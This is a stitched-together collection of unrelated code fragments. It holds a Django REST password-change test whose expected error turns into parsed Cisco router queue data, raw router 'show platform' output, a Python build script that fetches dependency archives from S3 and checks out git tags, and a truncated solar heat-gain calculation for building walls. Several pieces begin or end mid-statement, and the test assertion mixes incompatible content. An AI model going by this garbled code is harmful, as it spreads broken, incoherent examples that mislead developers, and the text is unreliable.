client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'old_password': [
{'if_h': 29,
'index': {'0': {'name': 'GigabitEthernet1/0/4',
'queue_id': '0xa3',
'software_control_info': {'cache_queue_id': '0x000000a3',
'debug_name': 'GigabitEthernet1/0/4',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 105000000,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x281',
'plevel': 0,
'port_uidb': 245731,
'priority': 65535,
'qlimit_bytes': 3281312,
'share': 1,
'sw_flags': '0x08000011',
'sw_state': '0x00000c01',
'wred': '0x88b16a92'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'GigabitEthernet1/0/5': {'if_h': 30,
'index': {'0': {'name': 'GigabitEthernet1/0/5',
'queue_id': '0xa4',
'software_control_info': {'cache_queue_id': '0x000000a4',
'debug_name': 'GigabitEthernet1/0/5',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 105000000,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x282',
'plevel': 0,
'port_uidb': 245730,
'priority': 65535,
'qlimit_bytes': 3281312,
'share': 1,
'sw_flags': '0x08000011',
'sw_state': '0x00000c01',
'wred': '0x88b16aa2'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'GigabitEthernet1/0/6': {'if_h': 31,
'index': {'0': {'name': 'GigabitEthernet1/0/6',
'queue_id': '0xa5',
'software_control_info': {'cache_queue_id': '0x000000a5',
'debug_name': 'GigabitEthernet1/0/6',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 105000000,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x283',
'plevel': 0,
'port_uidb': 245729,
'priority': 65535,
'qlimit_bytes': 3281312,
'share': 1,
'sw_flags': '0x08000011',
'sw_state': '0x00000c01',
'wred': '0x88b16ab2'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'GigabitEthernet1/0/7': {'if_h': 32,
'index': {'0': {'name': 'GigabitEthernet1/0/7',
'queue_id': '0xa6',
'software_control_info': {'cache_queue_id': '0x000000a6',
'debug_name': 'GigabitEthernet1/0/7',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 105000000,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x284',
'plevel': 0,
'port_uidb': 245728,
'priority': 65535,
'qlimit_bytes': 3281312,
'share': 1,
'sw_flags': '0x08000011',
'sw_state': '0x00000c01',
'wred': '0x88b16ac2'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'Loopback0': {'if_h': 33},
'Loopback2': {'if_h': 34},
'Null0': {'if_h': 6},
'TenGigabitEthernet0/2/0': {'if_h': 23,
'index': {'0': {'name': 'TenGigabitEthernet0/2/0',
'queue_id': '0x9d',
'software_control_info': {'cache_queue_id': '0x0000009d',
'debug_name': 'TenGigabitEthernet0/2/0',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 1050000000,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x27a',
'plevel': 0,
'port_uidb': 245737,
'priority': 65535,
'qlimit_bytes': 32812544,
'share': 1,
'sw_flags': '0x08000011',
'sw_state': '0x00000c01',
'wred': '0x88b16a32'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'TenGigabitEthernet0/3/0': {'if_h': 24,
'index': {'0': {'name': 'TenGigabitEthernet0/3/0',
'queue_id': '0x9e',
'software_control_info': {'cache_queue_id': '0x0000009e',
'debug_name': 'TenGigabitEthernet0/3/0',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 1050000000,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x27b',
'plevel': 0,
'port_uidb': 245736,
'priority': 65535,
'qlimit_bytes': 32812544,
'share': 1,
'sw_flags': '0x08000011',
'sw_state': '0x00000c01',
'wred': '0x88b16a42'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'VPLS-2320.1020896': {'if_h': 4260},
'VPLS-2321.1020897': {'if_h': 4261},
'VPLS-2322.1020898': {'if_h': 4262},
'VPLS-2816.102080a': {'if_h': 4120},
'VPLS-2817.102080b': {'if_h': 4121},
'VPLS-2818.102080c': {'if_h': 4122},
'VPLS-2819.102080d': {'if_h': 4123},
'VPLS-2820.102080e': {'if_h': 4124},
'VPLS-2944.10207e2': {'if_h': 4080},
'VPLS-2945.10207e3': {'if_h': 4081},
'VPLS-2946.10207e4': {'if_h': 4082},
'VPLS-2974.10207fb': {'if_h': 4105},
'VPLS-2975.10207fc': {'if_h': 4106},
'VPLS-3049.1020890': {'if_h': 4254},
'VPLS-3050.1020891': {'if_h': 4255},
'VPLS_maint.1020a6b': {'if_h': 4729},
'internal0/0/crypto:0': {'if_h': 4,
'index': {'0': {'name': 'i2l_if_4_cpp_0_prio0',
'queue_id': '0x8b',
'software_control_info': {'cache_queue_id': '0x0000008b',
'debug_name': 'i2l_if_4_cpp_0_prio0',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 0,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x265',
'plevel': 0,
'port_uidb': 245756,
'priority': 65535,
'qlimit_bytes': 80000064,
'share': 1,
'sw_flags': '0x08001001',
'sw_state': '0x00000c01',
'wred': '0x88b168f1'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}},
'1': {'name': 'i2l_if_4_cpp_0_prio1',
'queue_id': '0x8c',
'software_control_info': {'cache_queue_id': '0x0000008c',
'debug_name': 'i2l_if_4_cpp_0_prio1',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 0,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x266',
'plevel': 1,
'port_uidb': 245756,
'priority': 0,
'qlimit_bytes': 80000064,
'share': 0,
'sw_flags': '0x18001001',
'sw_state': '0x00000c01',
'wred': '0x88b16901'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'internal0/0/recycle:0': {'if_h': 1},
'internal0/0/rp:0': {'if_h': 2,
'index': {'0': {'name': 'i2l_if_2_cpp_0_prio0',
'queue_id': '0x87',
'software_control_info': {'cache_queue_id': '0x00000087',
'debug_name': 'i2l_if_2_cpp_0_prio0',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 0,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x263',
'plevel': 0,
'port_uidb': 245758,
'priority': 65535,
'qlimit_bytes': 3125056,
'share': 1,
'sw_flags': '0x08000001',
'sw_state': '0x00000c01',
'wred': '0x88b16872'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 294475395,
'total_enqs_packets': 4297477}},
'1': {'name': 'i2l_if_2_cpp_0_prio1',
'queue_id': '0x88',
'software_control_info': {'cache_queue_id': '0x00000088',
'debug_name': 'i2l_if_2_cpp_0_prio1',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 0,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x263',
'plevel': 1,
'port_uidb': 245758,
'priority': 0,
'qlimit_bytes': 3125056,
'share': 0,
'sw_flags': '0x18000001',
'sw_state': '0x00000c01',
'wred': '0x88b16882'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 203225236,
'total_enqs_packets': 1201820}}}},
'internal0/0/rp:1': {'if_h': 3,
'index': {'0': {'name': 'i2l_if_3_cpp_0_prio0',
'queue_id': '0x89',
'software_control_info': {'cache_queue_id': '0x00000089',
'debug_name': 'i2l_if_3_cpp_0_prio0',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 0,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x264',
'plevel': 0,
'port_uidb': 245757,
'priority': 65535,
'qlimit_bytes': 3125056,
'share': 1,
'sw_flags': '0x08000001',
'sw_state': '0x00000c01',
'wred': '0x88b168b2'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 46447411,
'total_enqs_packets': 670805}},
'1': {'name': 'i2l_if_3_cpp_0_prio1',
'queue_id': '0x8a',
'software_control_info': {'cache_queue_id': '0x0000008a',
'debug_name': 'i2l_if_3_cpp_0_prio1',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 0,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x264',
'plevel': 1,
'port_uidb': 245757,
'priority': 0,
'qlimit_bytes': 3125056,
'share': 0,
'sw_flags': '0x18000001',
'sw_state': '0x00000c01',
'wred': '0x88b168c2'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 269658370,
'total_enqs_packets': 1424992}}}}}
golden_output_active = {'execute.return_value': '''\
Router# show platform hardware qfp active infrastructure bqs queue output default all
Load for five secs: 2%/1%; one minute: 9%; five minutes: 8%
Time source is NTP, 07:47:13.438 EST Thu Sep 8 2016
Interface: internal0/0/recycle:0 QFP: 0.0 if_h: 1 Num Queues/Schedules: 0
No Queue/Schedule Info
Interface: internal0/0/rp:0 QFP: 0.0 if_h: 2 Num Queues/Schedules: 2
Queue specifics:
Index 0 (Queue ID:0x87, Name: i2l_if_2_cpp_0_prio0)
Software Control Info:
(cache) queue id: 0x00000087, wred: 0x88b16872, qlimit (bytes): 3125056
parent_sid: 0x263, debug_name: i2l_if_2_cpp_0_prio0
sw_flags: 0x08000001, sw_state: 0x00000c01, port_uidb: 245758
orig_min : 0 , min: 0
min_qos : 0 , min_dflt: 0
orig_max : 0 , max: 0
max_qos : 0 , max_dflt: 0
share : 1
plevel : 0, priority: 65535
defer_obj_refcnt: 0
Statistics:
tail drops (bytes): 0 , (packets): 0
total enqs (bytes): 294475395 , (packets): 4297477
queue_depth (bytes): 0
licensed throughput oversubscription drops:
(bytes): 0 , (packets): 0
Queue specifics:
Index 1 (Queue ID:0x88, Name: i2l_if_2_cpp_0_prio1)
Software Control Info:
(cache) queue id: 0x00000088, wred: 0x88b16882, qlimit (bytes): 3125056
parent_sid: 0x263, debug_name: i2l_if_2_cpp_0_prio1
sw_flags: 0x18000001, sw_state: 0x00000c01, port_uidb: 245758
orig_min : 0 , min: 0
min_qos : 0 , min_dflt: 0
orig_max : 0 , max: 0
max_qos : 0 , max_dflt: 0
share : 0
plevel : 1, priority: 0
defer_obj_refcnt: 0
Statistics:
tail drops (bytes): 0 , (packets): 0
total enqs (bytes): 203225236 , (packets): 1201820
queue_depth (bytes): 0
licensed throughput oversubscription drops:
(bytes): 0 , (packets): 0
Interface: internal0/0/rp:1 QFP: 0.0 if_h: 3 Num Queues/Schedules: 2
Queue specifics:
Index 0 (Queue ID:0x89, Name: i2l_if_3_cpp_0_prio0)
Software Control Info:
(cache) queue id: 0x00000089, wred: 0x88b168b2, qlimit (bytes): 3125056
parent_sid: 0x264, debug_name: i2l_if_3_cpp_0_prio0
sw_flags: 0x08000001, sw_state: 0x00000c01, port_uidb: 245757
orig_min : 0 , min: 0
min_qos : 0 , min_dflt: 0
orig_max : 0 , max: 0
max_qos : 0 , max_dflt: 0
share : 1
plevel : 0, priority: 65535
defer_obj_refcnt: 0
Statistics:
tail drops (bytes): 0 , (packets): 0
total enqs (bytes): 46447411 , (packets): 670805
queue_depth (bytes): 0
licensed throughput oversubscription drops:
(bytes): 0 , (packets): 0
Queue specifics:
Index 1 (Queue ID:0x8a, Name: i2l_if_3_cpp_0_prio1)
Software Control Info:
(cache) queue id: 0x0000008a, wred: 0x88b168c2, qlimit (bytes): 3125056
parent_sid: 0x264, debug_name: i2l_if_3_cpp_0_prio1
sw_flags: 0x18000001, sw_state: 0x00000c01, port_uidb: 245757
orig_min : 0 , min: 0
min_qos : 0 , min_dflt: 0
orig_max : 0 , max: 0
max_qos : 0 , max_dflt: 0
share : 0
plevel : 1, priority: 0
defer_obj_refcnt: 0
Statistics:
tail drops (bytes): 0 , (packets): 0
total enqs (bytes): 269658370 , (packets): 1424992
queue_depth (bytes): 0
import os
import tarfile
import zipfile
import re
import requests
import platform
import subprocess
import json
import shutil
import io
import tempfile
from default_platform import default_platform
import deps_cross_checker
import aws
# Master table of dependency types.
# A dependency definition can specify 'type' to inherit definitions from one of these.
# String values can depend on other string values from the dependency. For example,
# if 'name' is defined as 'Example' then '${name}.exe' will expand to 'Example.exe'.
# It does not matter which order the values are defined.
# String values can also depend on boolean values. For example, the string
# '${test-value?yes-result:no-result}' will get the value of the string named
# 'yes-result' if 'test-value' is a true boolean value, and the string named
# 'no-result' if 'test-value' is a false boolean value.
# Finally, string values can also depend on a lookup table defined as a JSON object.
# For example, given these definitions:
# {
# "servertable":{
# "Windows":"windows.openhome.org",
# "Linux":"linux.openhome.org",
# "*":"openhome.org"
# },
# "server":"${servertable[$system]}"
# }
# If 'system' is defined as 'Windows', then 'server' will be defined as
# 'windows.openhome.org'. The '*' entry is the default: if a lookup fails the default
# will be used instead.
# The principal string values that must be defined are 'archive-path' to point to the
# .tar.gz file with the dependency's binaries, 'dest' to specify where to untar it,
# and 'configure-args' to specify the list of arguments to pass to waf.
# In order for source control fetching to work, the string 'source-git' should point
# to the git repo and 'tag' should identify the git tag that corresponds to the
# fetched binaries.
DEPENDENCY_TYPES = {
# Ignore dependencies
# - ignored - effectively 'comments' out entire dependency
'ignore': {
'ignore': True
},
# Openhome dependencies
# - (legacy name - basically means that they are publicly visible and available)
# - generally have an associated git repo to allow us to fetch source code.
# - stored on AWS in the linn-artifacts-public bucket
#
# At a minimum must define:
# name
# version
'openhome': {
'archive-extension': '.tar.gz',
'archive-prefix': '',
'archive-suffix': '',
'binary-repo': 's3://linn-artifacts-public/artifacts',
'archive-directory': '${binary-repo}/${name}/',
'archive-filename': '${archive-prefix}${name}-${version}-${archive-platform}${archive-suffix}${archive-extension}',
'remote-archive-path': '${archive-directory}${archive-filename}',
'use-local-archive': False,
'archive-path': '${use-local-archive?local-archive-path:remote-archive-path}',
'source-path': '${<EMAIL>:/home/git',
'repo-name': '${name}',
'source-git': '${source-path}/${repo-name}.git',
'tag': '${repo-name}_${version}',
'any-platform': 'AnyPlatform',
'platform-specific': True,
'host-platform': default_platform(),
'archive-platform': '${platform-specific?platform:any-platform}',
'dest': 'dependencies/${archive-platform}/',
'configure-args': []
},
# Internal dependencies
# - only visible and available inside Linn
# - stored on AWS in the linn-artifacts-private bucket
#
# At a minimum must define:
# name
# version
'internal': {
'binary-repo': 's3://linn-artifacts-private',
'source-git': None,
'any-platform': 'AnyPlatform',
'platform-specific': True,
'archive-suffix': '',
'archive-filename': '${name}-${version}-${platform}${archive-suffix}.tar.gz',
'archive-platform': '${platform-specific?platform:any-platform}',
'archive-path': '${binary-repo}/${name}/${archive-filename}',
'host-platform': default_platform(),
'dest': 'dependencies/${archive-platform}/',
'configure-args': []
},
# External dependencies
#
# - publicly visible and available
# - no git repo that conforms to 'openhome standard'
# - stored on AWS in the linn-artifacts-public bucket
#
# At a minimum must define:
# name
# archive-filename
'external': {
'binary-repo': 's3://linn-artifacts-public/artifacts',
'source-git': None,
'any-platform': 'AnyPlatform',
'platform-specific': True,
'archive-platform': '${platform-specific?platform:any-platform}',
'archive-path': '${binary-repo}/${archive-platform}/${archive-filename}',
'host-platform': default_platform(),
'dest': 'dependencies/${archive-platform}/',
'configure-args': []
},
}
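# --- Hypothetical example (not part of the real dependency list) -----------
# A minimal sketch of how a dependency entry might use the 'openhome' type
# above: only 'name' and 'version' are mandatory, everything else is
# inherited from DEPENDENCY_TYPES and expanded at run time. The name and
# version below are invented for illustration.
EXAMPLE_OPENHOME_DEPENDENCY = {
    'name': 'ExampleLib',           # hypothetical dependency name
    'version': '1.2.3',             # hypothetical version
    'type': 'openhome',             # inherit the string definitions above
    # 'platform-specific': False,   # uncomment for an AnyPlatform archive
}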
class FileFetcher(object):
def __init__(self):
pass
def fetch(self, path):
if path.startswith("file:") or path.startswith("smb:"):
raise Exception("FETCH: File URLs deprecated")
elif path.startswith("s3:"):
return self.fetch_aws(path)
elif re.match(r"[^\W\d]{2,8}:", path):
raise Exception("FETCH: Legacy URLs no longer re-routed")
return self.fetch_local(path)
@staticmethod
def fetch_aws(awspath):
print(' from AWS %s' % awspath)
temppath = tempfile.mktemp( suffix='.tmp' )
try:
aws.copy(awspath, temppath)
return temppath
except:
raise Exception("FETCH: Unable to retrieve %s from AWS" % awspath)
return None
@staticmethod
def fetch_local(path):
print( ' from LOCAL PATH %s' % path)
return path
class EnvironmentExpander(object):
# template_regex matches the three template token forms: $$, $word and ${...}
template_regex = re.compile(r"""
(?x) # Enable whitespace and comments
(?P<dollar>\$\$)| # Match $$
(?P<word>\$[a-zA-Z_][a-zA-Z_0-9]*)| # Match $word
(?P<parens>\$\{[^}]*\}) # Match ${any-thing}
""")
# Matches foo[bar]
index_regex = re.compile(r"""
(?x) # Enable whitespace and comments
^ # Match only at start of string
([^][]*) # Match table name (no brackets allowed)
\[ # Match one open bracket: [
([^][]*) # Match key (no brackets allowed)
\] # Match one close bracket: ]
$
""")
def __init__(self, env_dict):
self.env_dict = env_dict
self.cache = {}
self.expandset = set()
def __getitem__(self, key):
return self.expand(key)
def getraw(self, key):
return self.env_dict[key]
def __contains__(self, key):
return key in self.env_dict
def keys(self):
return self.env_dict.keys()
def values(self):
return [self.expand(key) for key in self.keys()]
def items(self):
return [(key, self.expand(key)) for key in self.keys()]
def expand(self, key):
if key in self.cache:
return self.cache[key]
if key in self.expandset:
raise ValueError("Recursive expansion for key:", key)
self.expandset.add(key)
result = self._expand(key)
self.cache[key] = result
self.expandset.remove(key)
return result
def _expand(self, key):
if key not in self.env_dict:
raise KeyError("Key undefined:", key)
value = self.env_dict[key]
return self._expandvalue(value)
def _expandvalue(self, value):
if isinstance(value, ("".__class__, u"".__class__)):
return self.expandstring(value)
# return self.template_regex.sub(self.replacematch, value)
elif isinstance(value, (list, tuple)):
return [self._expandvalue(x) for x in value]
elif isinstance(value, dict):
return dict((k, self._expandvalue(v)) for (k, v) in value.items())
return value
def expandstring(self, value):
firstmatch = self.template_regex.match(value)
if firstmatch is not None and firstmatch.group(0) == value and value != "$$":
# Special case: The entire string is a single expansion. In this case,
# we allow the expansion to be *anything* (bool, int, list...),
# not just a string.
return self.replacematch(firstmatch)
return self.template_regex.sub(self.replacematch, value)
def replacematch(self, match):
if match.group('dollar'):
return '$'
key = None
if match.group('word'):
key = match.group('word')[1:]
if match.group('parens'):
key = match.group('parens')[2:-1]
assert key is not None
key = key.strip()
if '[' in key:
return self.expandlookup(key)
if '?' in key:
return self.expandconditional(key)
return self.expand(key)
def expandlookup(self, key):
match = self.index_regex.match(key)
if match is None:
raise ValueError('lookup must be of form ${table[key]}')
tablename = match.group(1).strip()
keyname = match.group(2).strip()
table = self.expand(tablename)
if keyname.startswith('$'):
key = self.expand(keyname[1:])
else:
key = keyname
if not isinstance(table, dict):
raise ValueError("lookup table must expand to a JSON object (got {0!r} instead)".format(table))
if not isinstance(key, ("".__class__, u"".__class__)):
raise ValueError("lookup index must expand to a JSON string (got {0!r} instead)".format(key))
if key not in table:
if '*' in table:
return table['*']
raise KeyError("Key not in table, and no default '*' entry found: key={0!r}\ntable={1!r}".format(key, table))
return table[key]
def expandconditional(self, key):
if '?' not in key:
raise ValueError('conditional must be of form ${condition?result:alternative}')
condition, rest = key.split('?', 1)
if ':' not in rest:
raise ValueError('conditional must be of form ${condition?result:alternative}')
primary, alternative = rest.split(':', 1)
condition, primary, alternative = [x.strip() for x in [condition, primary, alternative]]
try:
conditionvalue = self.expand(condition)
except KeyError:
conditionvalue = False
if self.is_trueish(conditionvalue):
return self.expand(primary)
return self.expand(alternative)
@staticmethod
def is_trueish(value):
if hasattr(value, "upper"):
value = value.upper()
return value in [1, "1", "YES", "Y", "TRUE", "ON", True]
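# --- Illustrative sketch only (not part of the build tooling) --------------
# Demonstrates the expansion rules documented at the top of this file:
# plain '${word}' substitution, the '${cond?yes:no}' conditional and the
# '${table[$key]}' lookup. All keys and values below are made up.
def _example_expansion():
    env = {
        'name': 'Example',
        'debug': False,
        'debug-suffix': '-dbg',
        'release-suffix': '',
        'suffix': '${debug?debug-suffix:release-suffix}',
        'archive': '${name}${suffix}.tar.gz',
        'system': 'Windows',
        'servertable': {
            'Windows': 'windows.openhome.org',
            'Linux': 'linux.openhome.org',
            '*': 'openhome.org'},
        'server': '${servertable[$system]}',
    }
    expander = EnvironmentExpander(env)
    print(expander.expand('archive'))   # -> 'Example.tar.gz'
    print(expander.expand('server'))    # -> 'windows.openhome.org'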
class Dependency(object):
def __init__(self, name, environment, fetcher, has_overrides=False):
self.expander = EnvironmentExpander(environment)
self.has_overrides = has_overrides
self.fetcher = fetcher
def fetch(self):
remote_path = self.expander.expand('archive-path')
local_path = os.path.abspath(self.expander.expand('dest'))
fetched_path = None
print("\nFetching '%s'" % self.name)
try:
fetched_path = self.fetcher.fetch(remote_path)
statinfo = os.stat(fetched_path)
if not statinfo.st_size:
os.unlink(fetched_path)
print(" **** WARNING - failed to fetch %s ****" % os.path.basename(remote_path))
return False
except IOError:
print(" **** FAILED ****")
return False
try:
os.makedirs(local_path)
except OSError:
# We get an error if the directory exists, which we are happy to
# ignore. If something worse went wrong, we will find out very
# soon when we try to extract the files.
pass
print(" unpacking to '%s'" % (local_path,))
if os.path.splitext(remote_path)[1].upper() in ['.ZIP', '.NUPKG', '.JAR']:
self.unzip(fetched_path, local_path)
else:
self.untar(fetched_path, local_path)
if fetched_path:
if fetched_path != remote_path:
os.unlink(fetched_path)
print("OK")
return True
@property
def name(self):
return self['name']
def __getitem__(self, key):
return self.expander.expand(key)
def __contains__(self, key):
return key in self.expander
def items(self):
return self.expander.items()
def checkout(self):
name = self['name']
sourcegit = self['source-git']
if sourcegit is None:
print('No git repo defined for {0}'.format(name))
return False
print("Fetching source for '%s'\n into '%s'" % (name, os.path.abspath('../' + name)))
tag = self['tag']
try:
if not os.path.exists('../' + name):
print(' git clone {0} {1}'.format(sourcegit, name))
subprocess.check_call(['git', 'clone', sourcegit, name], cwd='..', shell=False)
elif not os.path.isdir('../' + name):
print('Cannot checkout {0}, because directory ../{0} already exists'.format(name))
return False
else:
print(' git fetch origin')
subprocess.check_call(['git', 'fetch', 'origin'], cwd='../' + name, shell=False)
print(" git checkout {0}".format(tag))
subprocess.check_call(['git', 'checkout', tag], cwd='../' + name, shell=False)
except subprocess.CalledProcessError as cpe:
print(str(cpe))
return False
return True
@staticmethod
def untar(source, dest):
light opaque walls(W)
# - Q_dot_sh: total solar flux and infrared emission of heavy opaque walls
# - Q_dot_sd_tot: total direct solar flux through glazing
# - Q_dot_svl_tot: Solar gain due to the increase in temperature of the ventilated air cavity
#INPUTS
# - Lat: Latitude of the location (north positive) -90<Lat<90
# - Long: Longitude of the location (west positive) 0<Long<180
# - Long_st: Longitude of the standard meridian of the time zone
# - albedo: Ground albdo
# - SHGC_gl_0: Normal solar heat gain coefficient of window
# - p_SHGC: Angular dependency factor of SHGC for direct radiation
# - A_v_hopw,A_v_lopw: Vertical Opaque Walls surface area for each orientation (m)
# - A_t_gl: Vertical Windows surface area for each orientation (m)
# - n: day 1<n<365
# - h: hour 1<h<8760
# - I_glob_h: Global horizontal solar radiation
# - I_diff_h: Diffuse horizontal solar radiation
#Initialization:
# theta=zeros(1, n);
# theta_z=zeros(1, n_ori);
# gamma_s=zeros(1, n_ori);
# I_tot_w=zeros(1, n_ori);
# I_diff_w=zeros(1, n_ori);
# I_ref_w=zeros(1, n_ori);
# I_dir_w=zeros(1, n_ori);
# I_dir_n=zeros(1, n_ori);
# I_hemis_w=zeros(1, n_ori);
# I_sol_lopw=zeros(1, n_ori);
# I_sol_hopw=zeros(1, n_ori);
# Q_dot_sol_l=zeros(1, n_ori);
# Q_dot_sol_h=zeros(1, n_ori);
from numpy import zeros
from math import pi,cos
import pandas as pd
SurfaceDataFrameLabels = ['Q_dot_sol_h',
'I_diff_w',
'Q_dot_sol_gl_dir',
'SHGC_dir1',
'SHGC_dir2',
'Sp32_hemis',
'Sp31_dir',
'Sp22_hemis',
'Q_dot_sol_l',
'Q_dot_sd_hemis',
'Q_dot_svl_hemis',
'I_sol_hopw',
'I_dir_w',
'NL_ext',
'Sp11_dir',
'Sp21_dir',
'Sp22_dir',
'Sp12_dir',
'theta',
'I_dir_n',
'gamma_s',
'I_tot_w',
'I_hemis_w',
'SHGC_hemis2',
'Q_dot_svl_dir',
'SHGC1',
'SHGC2',
'Q_dot_sd_dir',
'Q_dot_IR_l',
'I_sol_lopw',
'Sp11_hemis',
'f_shad',
'Sp21_hemis',
'Sp31_hemis',
'Q_dot_sol_gl_hemis',
'SHGC_hemis1',
'Sp12_hemis',
'Sp32_dir',
'Q_dot_IR_h',
'I_ref_w',
'theta_z']
SurfaceList = [(x) for x in range(0,n_walls)]
Surface = pd.DataFrame(columns=SurfaceDataFrameLabels,index=SurfaceList)
for i in range(0,n_walls):
if I_glob_h > 0:
if (ori[i] == 'F') or (ori[i] == 'C'):
Surface.Q_dot_sol_h[i] = 0
Surface.Q_dot_sol_l[i] = 0
Surface.Q_dot_sol_gl_dir[i] = 0
Surface.Q_dot_sol_gl_hemis[i] = 0
Surface.Q_dot_sd_dir[i] = 0
Surface.Q_dot_sd_hemis[i] = 0
Surface.Q_dot_svl_dir[i] = 0
Surface.Q_dot_svl_hemis[i] = 0
Surface.I_tot_w[i] = 0
else:
Surface.theta[i], Surface.theta_z[i], Surface.gamma_s[i], Surface.I_tot_w[i], Surface.I_ref_w[i],\
Surface.I_diff_w[i], Surface.I_dir_w[i], Surface.I_dir_n[i] = \
INCIDENTRAD(Lat, Long, Long_st, albedo, n, h, I_glob_h, I_diff_h, surf_az[i], slope[i], f_low_dir[i],f_low_diff[i])
Surface.I_hemis_w[i] = Surface.I_ref_w[i] + Surface.I_diff_w[i]
#USE OF SHADINGS - Fraction of the area covered by shading system
#(vertical openings only)
if e_solshad[i] == 0:
Surface.f_shad[i] = 0
Surface.NL_ext[i] = 0
else:
Surface.f_shad[i], Surface.NL_ext[i] = SOLARSHAD(mode_solshad[i], NL_ext_max[i], Surface.I_tot_w[i])
# VERTICAL WALLS AND ROOF
#Heavy opaque vertical walls incident radiation
Surface.I_sol_hopw[i] = Surface.I_tot_w[i] #(W)
Surface.Q_dot_sol_h[i] = alpha_hopw[i] * A_v_hopw[i] * Surface.I_sol_hopw[i]
#Light opaque walls incident radiation
Surface.I_sol_lopw[i] = Surface.I_tot_w[i] #(W)
Surface.Q_dot_sol_l[i] = alpha_lopw[i] * A_v_lopw[i] * Surface.I_sol_lopw[i]
#VERTICAL AND HORIZONTAL WINDOWS
#SHGC and Light Transmittance without exterior solar shading
Surface.SHGC1[i] = SHGC_gl_0[i]
#SHGC and Light Transmittance with exterior solar shading
Surface.SHGC2[i] = IAC_solshad[i] * SHGC_gl_0[i]
